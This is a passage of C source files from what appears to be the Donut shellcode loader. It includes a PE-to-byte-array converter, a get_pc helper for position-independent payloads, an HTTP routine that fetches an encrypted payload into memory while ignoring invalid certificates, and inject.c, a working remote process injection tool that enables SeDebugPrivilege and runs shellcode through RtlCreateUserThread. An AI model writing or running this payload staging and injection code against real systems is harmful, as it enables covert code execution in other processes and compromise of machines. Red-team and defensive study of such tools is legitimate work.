24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <stdio.h>
32 #include <string.h>
33 #include <stdlib.h>
34 #include <stdint.h>
35 #include <ctype.h>
36
37 #include <fcntl.h>
38 #include <errno.h>
39 #include <sys/types.h>
40 #include <sys/stat.h>
41
42 #if defined(_WIN32) || defined(_WIN64)
43 #define WINDOWS
44 #include <windows.h>
45 #include <shlwapi.h>
46 #include "mmap.h"
47 #pragma comment(lib, "shlwapi.lib")
48 #else
49 #define NIX
50 #include <libgen.h>
51 #include <sys/mman.h>
52 #include <unistd.h>
53 #include <pe.h>
54 #endif
55
56 // return pointer to DOS header
57 PIMAGE_DOS_HEADER DosHdr(void *map) {
58 return (PIMAGE_DOS_HEADER)map;
59 }
60
61 // return pointer to NT header
62 PIMAGE_NT_HEADERS NtHdr (void *map) {
63 return (PIMAGE_NT_HEADERS) ((uint8_t*)map + DosHdr(map)->e_lfanew);
64 }
65
66 // return pointer to File header
67 PIMAGE_FILE_HEADER FileHdr (void *map) {
68 return &NtHdr(map)->FileHeader;
69 }
70
71 // determines CPU architecture of binary
72 int is32 (void *map) {
73 return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_I386;
74 }
75
76 // determines CPU architecture of binary
77 int is64 (void *map) {
78 return FileHdr(map)->Machine == IMAGE_FILE_MACHINE_AMD64;
79 }
80
81 // return pointer to Optional header
82 void* OptHdr (void *map) {
83 return (void*)&NtHdr(map)->OptionalHeader;
84 }
85
86 // return pointer to first section header
87 PIMAGE_SECTION_HEADER SecHdr (void *map) {
88 PIMAGE_NT_HEADERS nt = NtHdr(map);
89
90 return (PIMAGE_SECTION_HEADER)((uint8_t*)&nt->OptionalHeader +
91 nt->FileHeader.SizeOfOptionalHeader);
92 }
93
94 uint32_t DirSize (void *map) {
95 if (is32(map)) {
96 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->NumberOfRvaAndSizes;
97 } else {
98 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->NumberOfRvaAndSizes;
99 }
100 }
101
102 uint32_t SecSize (void *map) {
103 return NtHdr(map)->FileHeader.NumberOfSections;
104 }
105
106 PIMAGE_DATA_DIRECTORY Dirs (void *map) {
107 if (is32(map)) {
108 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->DataDirectory;
109 } else {
110 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->DataDirectory;
111 }
112 }
113
114 uint64_t ImgBase (void *map) {
115 if (is32(map)) {
116 return ((PIMAGE_OPTIONAL_HEADER32)OptHdr(map))->ImageBase;
117 } else {
118 return ((PIMAGE_OPTIONAL_HEADER64)OptHdr(map))->ImageBase;
119 }
120 }
121
122 // valid dos header?
123 int valid_dos_hdr (void *map) {
124 PIMAGE_DOS_HEADER dos = DosHdr(map);
125
126 if (dos->e_magic != IMAGE_DOS_SIGNATURE) return 0;
127 return (dos->e_lfanew != 0);
128 }
129
130 // valid nt headers
131 int valid_nt_hdr (void *map) {
132 return NtHdr(map)->Signature == IMAGE_NT_SIGNATURE;
133 }
134
135 uint32_t rva2ofs (void *map, uint32_t rva) {
136 int i;
137
138 PIMAGE_SECTION_HEADER sh = SecHdr(map);
139
140 for (i=0; i<SecSize(map); i++) {
141 if (rva >= sh[i].VirtualAddress && rva < sh[i].VirtualAddress + sh[i].SizeOfRawData)
142 return sh[i].PointerToRawData + (rva - sh[i].VirtualAddress);
143 }
144 return -1;
145 }
146
147 void bin2h(void *map, char *fname, void *bin, uint32_t len) {
148 char label[32], file[32], *str;
149 uint32_t i;
150 uint8_t *p=(uint8_t*)bin;
151 FILE *fd;
152
153 memset(label, 0, sizeof(label));
154 memset(file, 0, sizeof(file));
155
156 #if defined(WINDOWS)
157 str = PathFindFileName(fname);
158 #else
159 str = basename(fname);
160 #endif
161 for(i=0; str[i] != 0 && i < 16;i++) {
162 if(str[i] == '.') {
163 file[i] = label[i] = '_';
164 } else {
165 label[i] = toupper(str[i]);
166 file[i] = tolower(str[i]);
167 }
168 }
169 if(map != NULL) {
170 strcat(label, is32(map) ? "_X86" : "_X64");
171 strcat(file, is32(map) ? "_x86" : "_x64");
172 }
173 strcat(file, ".h");
174
175 fd = fopen(file, "wb");
176
177 if(fd != NULL) {
178 fprintf(fd, "\nunsigned char %s[] = {", label);
179
180 for(i=0;i<len;i++) {
181 if(!(i % 12)) fprintf(fd, "\n ");
182 fprintf(fd, "0x%02x", p[i]);
183 if((i+1) != len) fprintf(fd, ", ");
184 }
185 fprintf(fd, "};\n\n");
186 fclose(fd);
187 printf(" [ saved code to %s\n", file);
188 } else printf(" [ unable to create file : %s\n", file);
189 }
190
191 void bin2go(void* map, char* fname, void* bin, uint32_t len) {
192 char label[32], file[32], * str;
193 uint32_t i;
194 uint8_t* p = (uint8_t*)bin;
195 FILE* fd;
196
197 memset(label, 0, sizeof(label));
198 memset(file, 0, sizeof(file));
199
200 #if defined(WINDOWS)
201 str = PathFindFileName(fname);
202 #else
203 str = basename(fname);
204 #endif
205 for (i = 0; str[i] != 0 && i < 16; i++) {
206 if (str[i] == '.') {
207 file[i] = label[i] = '_';
208 }
209 else {
210 label[i] = toupper(str[i]);
211 file[i] = tolower(str[i]);
212 }
213 }
214 if (map != NULL) {
215 strcat(label, is32(map) ? "_X86" : "_X64");
216 strcat(file, is32(map) ? "_x86" : "_x64");
217 }
218 strcat(file, ".go");
219
220 fd = fopen(file, "wb");
221
222 if (fd != NULL) {
223 fprintf(fd, "package donut\n\n// %s - stub for EXE PE files\nvar %s = []byte{\n", label, label);
224
225 for (i = 0; i < len; i++) {
226 if (!(i % 12)) fprintf(fd, "\n ");
227 fprintf(fd, "0x%02x", p[i]);
228 if ((i + 1) != len) fprintf(fd, ", ");
229 }
230 fprintf(fd, "};\n\n");
231 fclose(fd);
232 printf(" [ saved code to %s\n", file);
233 }
234 else printf(" [ unable to create file : %s\n", file);
235 }
236
237
238 /**
239 void bin2array(void *map, char *fname, void *bin, uint32_t len) {
240 char label[32], file[32], *str;
241 uint32_t i;
242 uint32_t *p=(uint32_t*)bin;
243 FILE *fd;
244
245 memset(label, 0, sizeof(label));
246 memset(file, 0, sizeof(file));
247
248 #if defined(WINDOWS)
249 str = PathFindFileName(fname);
250 #else
251 str = basename(fname);
252 #endif
253 for(i=0; str[i] != 0 && i < 16;i++) {
254 if(str[i] == '.') {
255 file[i] = label[i] = '_';
256 } else {
257 label[i] = toupper(str[i]);
258 file[i] = tolower(str[i]);
259 }
260 }
261
262 strcat(file, ".h");
263
264 fd = fopen(file, "wb");
265
266 if(fd != NULL) {
267 // align up by 4
268 len = (len & -4) + 4;
269 len >>= 2;
270
271 // declare the array
272 fprintf(fd, "\nunsigned int %s[%i];\n\n", label, len);
273
274 // initialize array
275 for(i=0; i<len; i++) {
276 fprintf(fd, "%s[%i] = 0x%08" PRIX32 ";\n", label, i, p[i]);
277 }
278 fclose(fd);
279 printf(" [ Saved array to %s\n", file);
280 } else printf(" [ unable to create file : %s\n", file);
281 }
282 */
283 // structure of COFF (.obj) file
284
285 //--------------------------//
286 // IMAGE_FILE_HEADER //
287 //--------------------------//
288 // IMAGE_SECTION_HEADER //
289 // * num sections //
290 //--------------------------//
291 // //
292 // //
293 // //
294 // section data //
295 // * num sections //
296 // //
297 // //
298 //--------------------------//
299 // IMAGE_SYMBOL //
300 // * num symbols //
301 //--------------------------//
302 // string table //
303 //--------------------------//
304
305 int main (int argc, char *argv[]) {
306 int fd, i;
307 struct stat fs;
308 uint8_t *map, *cs;
309 PIMAGE_SECTION_HEADER sh;
310 //PIMAGE_FILE_HEADER fh;
311 //PIMAGE_COFF_SYMBOLS_HEADER csh;
312 uint32_t ofs, len;
313
314 if (argc != 2) {
315 printf ("\n [ usage: file2h <file.exe | file.bin>\n");
316 return 0;
317 }
318
319 // open file for reading
320 fd = open(argv[1], O_RDONLY);
321
322 if(fd == 0) {
323 printf(" [ unable to open %s\n", argv[1]);
324 return 0;
325 }
326 // if file has some data
327 if(fstat(fd, &fs) == 0) {
328 // map into memory
329 map = (uint8_t*)mmap(NULL, fs.st_size,
330 PROT_READ, MAP_PRIVATE, fd, 0);
331 if(map != NULL) {
332 if(valid_dos_hdr(map) && valid_nt_hdr(map)) {
333 printf(" [ Found valid DOS and NT header.\n");
334 // get the .text section
335 sh = SecHdr(map);
336 // if a section header was returned
337 if(sh != NULL) {
338 printf(" [ Locating .text section.\n");
339 // locate the .text section
340 for(i=0; i<SecSize(map); i++) {
341 if(strcmp((char*)sh[i].Name, ".text") == 0) {
342 ofs = rva2ofs(map, sh[i].VirtualAddress);
343
344 if(ofs != -1) {
345 cs = (map + ofs);
346 len = sh[i].Misc.VirtualSize;
347 // convert to header file
348 bin2h(map, argv[1], cs, len);
349 bin2go(map, argv[1], cs, len);
350 break;
351 }
352 }
353 }
354 }
355 } else {
356 printf(" [ No valid DOS or NT header found.\n");
357 // treat file as binary
358 bin2h(NULL, argv[1], map, fs.st_size);
359 bin2go(NULL, argv[1], map, fs.st_size);
360 //bin2array(NULL, argv[1], map, fs.st_size);
361 }
362 munmap(map, fs.st_size);
363 }
364 }
365 close(fd);
366 return 0;
367 }
+73
-0
loader/exe2h/mmap-windows.c less more
0 /* mmap() replacement for Windows
1 *
2 * Author: Mike Frysinger <[email protected]>
3 * Placed into the public domain
4 */
5
6 /* References:
7 * CreateFileMapping: http://msdn.microsoft.com/en-us/library/aa366537(VS.85).aspx
8 * CloseHandle: http://msdn.microsoft.com/en-us/library/ms724211(VS.85).aspx
9 * MapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366761(VS.85).aspx
10 * UnmapViewOfFile: http://msdn.microsoft.com/en-us/library/aa366882(VS.85).aspx
11 */
12
13 #include "mmap.h"
14
15 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset)
16 {
17 if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC))
18 return MAP_FAILED;
19 if (fd == -1) {
20 if (!(flags & MAP_ANON) || offset)
21 return MAP_FAILED;
22 } else if (flags & MAP_ANON)
23 return MAP_FAILED;
24
25 DWORD flProtect;
26 if (prot & PROT_WRITE) {
27 if (prot & PROT_EXEC)
28 flProtect = PAGE_EXECUTE_READWRITE;
29 else
30 flProtect = PAGE_READWRITE;
31 } else if (prot & PROT_EXEC) {
32 if (prot & PROT_READ)
33 flProtect = PAGE_EXECUTE_READ;
34 else if (prot & PROT_EXEC)
35 flProtect = PAGE_EXECUTE;
36 } else
37 flProtect = PAGE_READONLY;
38
39 off_t end = length + offset;
40 HANDLE mmap_fd, h;
41 if (fd == -1)
42 mmap_fd = INVALID_HANDLE_VALUE;
43 else
44 mmap_fd = (HANDLE)_get_osfhandle(fd);
45 h = CreateFileMapping(mmap_fd, NULL, flProtect, DWORD_HI(end), DWORD_LO(end), NULL);
46 if (h == NULL)
47 return MAP_FAILED;
48
49 DWORD dwDesiredAccess;
50 if (prot & PROT_WRITE)
51 dwDesiredAccess = FILE_MAP_WRITE;
52 else
53 dwDesiredAccess = FILE_MAP_READ;
54 if (prot & PROT_EXEC)
55 dwDesiredAccess |= FILE_MAP_EXECUTE;
56 if (flags & MAP_PRIVATE)
57 dwDesiredAccess |= FILE_MAP_COPY;
58 void *ret = MapViewOfFile(h, dwDesiredAccess, DWORD_HI(offset), DWORD_LO(offset), length);
59 if (ret == NULL) {
60 ret = MAP_FAILED;
61 }
62 CloseHandle(h);
63 return ret;
64 }
65
66 void munmap(void *addr, size_t length)
67 {
68 UnmapViewOfFile(addr);
69 }
70
71 #undef DWORD_HI
72 #undef DWORD_LO
+45
-0
loader/exe2h/mmap.h less more
0
1
2 #ifndef MMAP_H
3 #define MMAP_H
4
5 #include <io.h>
6 #include <windows.h>
7 #include <sys/types.h>
8
9 #define PROT_READ 0x1
10 #define PROT_WRITE 0x2
11 /* This flag is only available in WinXP+ */
12 #ifdef FILE_MAP_EXECUTE
13 #define PROT_EXEC 0x4
14 #else
15 #define PROT_EXEC 0x0
16 #define FILE_MAP_EXECUTE 0
17 #endif
18
19 #define MAP_SHARED 0x01
20 #define MAP_PRIVATE 0x02
21 #define MAP_ANONYMOUS 0x20
22 #define MAP_ANON MAP_ANONYMOUS
23 #define MAP_FAILED ((void *) -1)
24
25 #ifdef __USE_FILE_OFFSET64
26 # define DWORD_HI(x) (x >> 32)
27 # define DWORD_LO(x) ((x) & 0xffffffff)
28 #else
29 # define DWORD_HI(x) (0)
30 # define DWORD_LO(x) (x)
31 #endif
32
33 #ifdef __cplusplus
34 extern "C" {
35 #endif
36
37 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset);
38 void munmap(void *addr, size_t length);
39
40 #ifdef __cplusplus
41 }
42 #endif
43
44 #endif
+61
-0
loader/getpc.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 // Function to return the program counter.
32 // Always place this at the end of payload.
33 // Tested with x86 build of MSVC 2019 and MinGW. YMMV.
34 #if defined(_MSC_VER)
35 #if defined(_M_IX86)
36 __declspec(naked) char *get_pc(void) {
37 __asm {
38 call pc_addr
39 pc_addr:
40 pop eax
41 sub eax, 5
42 ret
43 }
44 }
45 #endif
46 #elif defined(__GNUC__)
47 #if defined(__i386__)
48 asm (
49 ".global get_pc\n"
50 ".global _get_pc\n"
51 "_get_pc:\n"
52 "get_pc:\n"
53 " call pc_addr\n"
54 "pc_addr:\n"
55 " pop %eax\n"
56 " sub $5, %eax\n"
57 " ret\n"
58 );
59 #endif
60 #endif
+194
-0
loader/http_client.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 BOOL DownloadFromHTTP(PDONUT_INSTANCE inst) {
32 HINTERNET hin, con, req;
33 PBYTE buf;
34 DWORD s, n, rd, len, code=0;
35 BOOL bResult = FALSE, bSecure = FALSE;
36 URL_COMPONENTS uc;
37 CHAR host[DONUT_MAX_NAME],
38 file[DONUT_MAX_NAME];
39
40 // default flags for HTTP client
41 DWORD flags = INTERNET_FLAG_KEEP_CONNECTION |
42 INTERNET_FLAG_NO_CACHE_WRITE |
43 INTERNET_FLAG_NO_UI |
44 INTERNET_FLAG_RELOAD |
45 INTERNET_FLAG_NO_AUTO_REDIRECT;
46
47 Memset(&uc, 0, sizeof(uc));
48
49 uc.dwStructSize = sizeof(uc);
50 uc.lpszHostName = host;
51 uc.lpszUrlPath = file;
52 uc.dwHostNameLength = DONUT_MAX_NAME;
53 uc.dwUrlPathLength = DONUT_MAX_NAME;
54
55 DPRINT("Decoding URL %s", inst->server);
56
57 if(!inst->api.InternetCrackUrl(
58 inst->server, 0, ICU_DECODE, &uc)) {
59 return FALSE;
60 }
61
62 bSecure = (uc.nScheme == INTERNET_SCHEME_HTTPS);
63
64 // if secure connection, update the flags to ignore
65 // invalid certificates
66 if(bSecure) {
67 flags |= INTERNET_FLAG_IGNORE_CERT_CN_INVALID |
68 INTERNET_FLAG_IGNORE_CERT_DATE_INVALID |
69 INTERNET_FLAG_SECURE;
70 }
71
72 DPRINT("Initializing WININET");
73
74 hin = inst->api.InternetOpen(
75 NULL, INTERNET_OPEN_TYPE_PRECONFIG,
76 NULL, NULL, 0);
77
78 if(hin == NULL) return FALSE;
79
80 DPRINT("Creating %s connection for %s",
81 bSecure ? "HTTPS" : "HTTP", host);
82
83 con = inst->api.InternetConnect(
84 hin, host, uc.nPort, NULL, NULL,
85 INTERNET_SERVICE_HTTP, 0, 0);
86
87 if(con != NULL) {
88 DPRINT("Creating HTTP %s request for %s",
89 inst->http_req, file);
90
91 req = inst->api.HttpOpenRequest(
92 con, inst->http_req,
93 file, NULL, NULL, NULL, flags, 0);
94
95 if(req != NULL) {
96
97 // see if we should ignore invalid certificates for this request
98 if(bSecure) {
99 if(flags & INTERNET_FLAG_IGNORE_CERT_CN_INVALID) {
100 n = sizeof (s);
101
102 s = SECURITY_FLAG_IGNORE_UNKNOWN_CA |
103 SECURITY_FLAG_IGNORE_CERT_DATE_INVALID |
104 SECURITY_FLAG_IGNORE_CERT_CN_INVALID |
105 SECURITY_FLAG_IGNORE_WRONG_USAGE |
106 SECURITY_FLAG_IGNORE_REVOCATION;
107
108 DPRINT("Setting option to ignore invalid certificates");
109
110 inst->api.InternetSetOption(
111 req,
112 INTERNET_OPTION_SECURITY_FLAGS,
113 &s,
114 sizeof(s));
115 }
116 }
117 DPRINT("Sending request");
118
119 if(inst->api.HttpSendRequest(req, NULL, 0, NULL, 0)) {
120 len = sizeof(DWORD);
121 code = 0;
122 DPRINT("Querying status code");
123
124 if(inst->api.HttpQueryInfo(
125 req,
126 HTTP_QUERY_STATUS_CODE | HTTP_QUERY_FLAG_NUMBER,
127 &code, &len, 0))
128 {
129 DPRINT("Code is %ld", code);
130
131 if(code == HTTP_STATUS_OK) {
132 DPRINT("Querying content length");
133
134 len = sizeof(SIZE_T);
135 inst->mod_len = 0;
136
137 if(inst->api.HttpQueryInfo(
138 req,
139 HTTP_QUERY_CONTENT_LENGTH | HTTP_QUERY_FLAG_NUMBER,
140 &inst->mod_len, &len, 0))
141 {
142 if(inst->mod_len != 0) {
143 DPRINT("Allocating memory for module");
144
145 inst->module.p = inst->api.VirtualAlloc(
146 NULL, inst->mod_len,
147 MEM_COMMIT | MEM_RESERVE,
148 PAGE_READWRITE);
149
150 if(inst->module.p != NULL) {
151 rd = 0;
152 DPRINT("Downloading module into memory");
153 bResult = inst->api.InternetReadFile(
154 req,
155 inst->module.p,
156 inst->mod_len, &rd);
157 }
158 }
159 }
160 }
161 }
162 }
163 DPRINT("Closing request handle");
164 inst->api.InternetCloseHandle(req);
165 }
166 DPRINT("Closing HTTP connection");
167 inst->api.InternetCloseHandle(con);
168 }
169 DPRINT("Closing internet handle");
170 inst->api.InternetCloseHandle(hin);
171
172 if(bResult && inst->entropy == DONUT_ENTROPY_DEFAULT) {
173 PDONUT_MODULE mod = inst->module.p;
174
175 DPRINT("Decrypting %lli bytes of module", inst->mod_len);
176
177 donut_decrypt(inst->mod_key.mk,
178 inst->mod_key.ctr,
179 mod,
180 inst->mod_len);
181
182 DPRINT("Generating hash to verify decryption");
183 ULONG64 mac = maru(inst->sig, inst->iv);
184
185 DPRINT("Module : %016llx | Result : %016llx", mod->mac, mac);
186
187 if(mac != mod->mac) {
188 DPRINT("Decryption failed");
189 return FALSE;
190 }
191 }
192 return bResult;
193 }
+237
-0
loader/inject.c less more
0 /**
1 BSD 3-Clause License
2
3 Copyright (c) 2019, TheWover, Odzhan. All rights reserved.
4
5 Redistribution and use in source and binary forms, with or without
6 modification, are permitted provided that the following conditions are met:
7
8 * Redistributions of source code must retain the above copyright notice, this
9 list of conditions and the following disclaimer.
10
11 * Redistributions in binary form must reproduce the above copyright notice,
12 this list of conditions and the following disclaimer in the documentation
13 and/or other materials provided with the distribution.
14
15 * Neither the name of the copyright holder nor the names of its
16 contributors may be used to endorse or promote products derived from
17 this software without specific prior written permission.
18
19 THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
20 AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
21 IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
22 DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
23 FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
24 DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
25 SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
26 CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
27 OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
28 OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
29 */
30
31 #include <Windows.h>
32 #include <stdio.h>
33 #include <tlhelp32.h>
34
35 #pragma comment(lib, "advapi32.lib")
36 #pragma comment(lib, "shell32.lib")
37 #pragma comment(lib, "user32.lib")
38
39 typedef struct _CLIENT_ID {
40 PVOID UniqueProcess;
41 PVOID UniqueThread;
42 } CLIENT_ID, *PCLIENT_ID;
43
44 typedef NTSTATUS (NTAPI *RtlCreateUserThread_t) (
45 IN HANDLE ProcessHandle,
46 IN PSECURITY_DESCRIPTOR SecurityDescriptor OPTIONAL,
47 IN BOOLEAN CreateSuspended,
48 IN ULONG StackZeroBits,
49 IN OUT PULONG StackReserved,
50 IN OUT PULONG StackCommit,
51 IN PVOID StartAddress,
52 IN PVOID StartParameter OPTIONAL,
53 OUT PHANDLE ThreadHandle,
54 OUT PCLIENT_ID ClientID);
55
56 BOOL EnablePrivilege(PCHAR szPrivilege){
57 HANDLE hToken;
58 BOOL bResult;
59 LUID luid;
60 TOKEN_PRIVILEGES tp;
61
62 // open token for current process
63 bResult = OpenProcessToken(GetCurrentProcess(),
64 TOKEN_ADJUST_PRIVILEGES, &hToken);
65
66 if(!bResult) return FALSE;
67
68 // lookup privilege
69 bResult = LookupPrivilegeValue(NULL, szPrivilege, &luid);
70 if(bResult){
71 tp.PrivilegeCount = 1;
72 tp.Privileges[0].Luid = luid;
73 tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
74
75 // adjust token
76 bResult = AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL);
77 }
78 CloseHandle(hToken);
79 return bResult;
80 }
81
82 // display error message for last error code
83 VOID xstrerror (PCHAR fmt, ...){
84 PCHAR error=NULL;
85 va_list arglist;
86 CHAR buffer[1024];
87 DWORD dwError=GetLastError();
88
89 va_start(arglist, fmt);
90 vsnprintf(buffer, ARRAYSIZE(buffer), fmt, arglist);
91 va_end (arglist);
92
93 if (FormatMessage (
94 FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,
95 NULL, dwError, MAKELANGID(LANG_NEUTRAL, SUBLANG_DEFAULT),
96 (LPSTR)&error, 0, NULL))
97 {
98 printf(" [ %s : %s\n", buffer, error);
99 LocalFree (error);
100 } else {
101 printf(" [ %s error : %08lX\n", buffer, dwError);
102 }
103 }
104
105 DWORD name2pid(PCHAR procName){
106 HANDLE hSnap;
107 PROCESSENTRY32 pe32;
108 DWORD pid=0;
109
110 // create snapshot of system
111 hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
112 if(hSnap == INVALID_HANDLE_VALUE) return 0;
113
114 pe32.dwSize = sizeof(PROCESSENTRY32);
115
116 // get first process
117 if(Process32First(hSnap, &pe32)){
118 do {
119 if(!lstrcmpi(pe32.szExeFile, procName)){
120 pid=pe32.th32ProcessID;
121 break;
122 }
123 } while(Process32Next(hSnap, &pe32));
124 }
125 CloseHandle(hSnap);
126 return pid;
127 }
128
129 BOOL injectPIC(DWORD id, LPVOID code, DWORD codeLen) {
130 SIZE_T wr;
131 HANDLE hp,ht;
132 LPVOID cs;
133 RtlCreateUserThread_t pRtlCreateUserThread;
134 HMODULE hn;
135 CLIENT_ID cid;
136 NTSTATUS nt=~0UL;
137 DWORD t;
138
139 // 1. resolve API address
140 hn = GetModuleHandle("ntdll.dll");
141 pRtlCreateUserThread=(RtlCreateUserThread_t)
142 GetProcAddress(hn, "RtlCreateUserThread");
143
144 printf(" [ opening process %li\n", id);
145 // 2. open the target process
146 hp=OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);
147
148 if(hp == NULL) return FALSE;
149
150 // 3. allocate executable-read-write (XRW) memory for payload
151 printf(" [ allocating memory for payload.\n");
152 cs=VirtualAllocEx(hp, NULL, codeLen,
153 MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
154
155 printf(" [ writing code to %p.\n", cs);
156 // 4. copy the payload to remote memory
157 WriteProcessMemory(hp, cs, code, codeLen, &wr);
158 VirtualProtectEx(hp, cs, codeLen, PAGE_EXECUTE_READ, &t);
159
160 printf(" [ press any key to continue.\n");
161 getchar();
162
163 // 5. execute payload in remote process
164 printf(" [ creating new thread.\n");
165 nt = pRtlCreateUserThread(hp, NULL, FALSE, 0, NULL,
166 NULL, cs, NULL, &ht, &cid);
167
168 //AttachConsole(id);
169
170 printf(" [ nt status is %lx\n", nt);
171 WaitForSingleObject(ht, INFINITE);
172
173 // 6. close remote thread handle
174 CloseHandle(ht);
175
176 // 7. free remote memory
177 printf(" [ freeing memory.\n");
178 VirtualFreeEx(hp, cs, codeLen, MEM_RELEASE | MEM_DECOMMIT);
179
180 // 8. close remote process handle
181 CloseHandle(hp);
182 return nt == 0; // STATUS_SUCCESS
183 }
184
185 DWORD getdata(PCHAR path, LPVOID *data){
186 HANDLE hf;
187 DWORD len,rd=0;
188
189 // 1. open the file
190 hf=CreateFile(path, GENERIC_READ, 0, 0,
191 OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
192
193 if(hf!=INVALID_HANDLE_VALUE){
194 // get file size
195 len=GetFileSize(hf, 0);
196 // allocate memory
197 *data=malloc(len + 16);
198 // read file contents into memory
199 ReadFile(hf, *data, len, &rd, 0);
200 CloseHandle(hf);
201 }
202 return rd;
203 }
204
205 int main(int argc, char *argv[]){
206 LPVOID code;
207 SIZE_T code_len;
208 DWORD pid;
209
210 if (argc != 3){
211 printf("\n [ usage: inject <process id | process name> <payload.bin>\n");
212 return 0;
213 }
214
215 if(!EnablePrivilege(SE_DEBUG_NAME)) {
216 printf(" [ cannot enable SeDebugPrivilege.\n");
217 }
218
219 // get pid
220 pid=atoi(argv[1]);
221 if(pid==0) pid=name2pid(argv[1]);
222
223 if(pid==0) {
224 printf(" [ unable to obtain process id.\n");
225 return 0;
226 }
227 // pic
228 code_len = getdata(argv[2], &code);
229 if(code_len == 0) {
230 printf(" [ unable to read payload.\n");
231 return 0;
232 }
233 injectPIC(pid, code, code_len);
234 free(code);
235 return 0;
236 }
+358
-0
loader/inmem_dotnet.c less more
0 /**
1 BSD 3-Clause License
2
